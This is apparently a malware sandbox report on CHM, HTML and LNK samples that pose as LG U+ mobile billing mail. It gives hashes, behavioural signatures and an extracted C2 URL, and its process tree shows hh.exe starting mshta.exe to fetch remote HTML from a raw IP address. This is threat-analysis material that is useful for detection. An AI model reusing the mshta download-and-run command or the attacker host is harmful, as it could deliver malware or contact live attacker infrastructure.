Overview
overview
10Static
static
8LG유플....html
windows7-x64
1LG유플....html
windows10-2004-x64
1LG유플...ml.lnk
windows7-x64
10LG유플...ml.lnk
windows10-2004-x64
10MAIL_20230...02.chm
windows7-x64
10MAIL_20230...02.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Analysis
-
max time kernel
135s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 23:32
Behavioral task
behavioral1
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
MAIL_20230125151802.chm
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
MAIL_20230125151802.chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral7
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
Message.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
Message.chm
Resource
win10v2004-20230220-en
General
-
Target
MAIL_20230125151802.chm
-
Size
10KB
-
MD5
45bd3001517f5e913ddde83827f4cc29
-
SHA1
710a7d78c4bbca17d6cefce8c392e7d358c37a8d
-
SHA256
c80fbab8c27cb9be91885a470377088d6639b95b85dfe5ae3c346e537b143a87
-
SHA512
c2dcf7d3d6e1353fe6259e326517c07c2e168bc83c0847c293d15d2a0fcc0bbec31506de2347b45a6455465d88a27bde68179352c4473a8eac7ce63b3581bb75
-
SSDEEP
48:U5yGg202QRlEFlErlElZO5sD7GH6N6xWX3VGJtihAxkNzY94ApKSE7HWVMjUBxBD:U5y6khHq6UMl94A0AMjUBxBjR7UyEf0
Malware Config
Extracted
http://141.105.65.165/data/3.html
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 20 4424 mshta.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 4656 hh.exe 4656 hh.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
hh.exedescription pid process target process PID 4656 wrote to memory of 4424 4656 hh.exe mshta.exe PID 4656 wrote to memory of 4424 4656 hh.exe mshta.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\MAIL_20230125151802.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://141.105.65.165/data/3.html ,2⤵
- Blocklisted process makes network request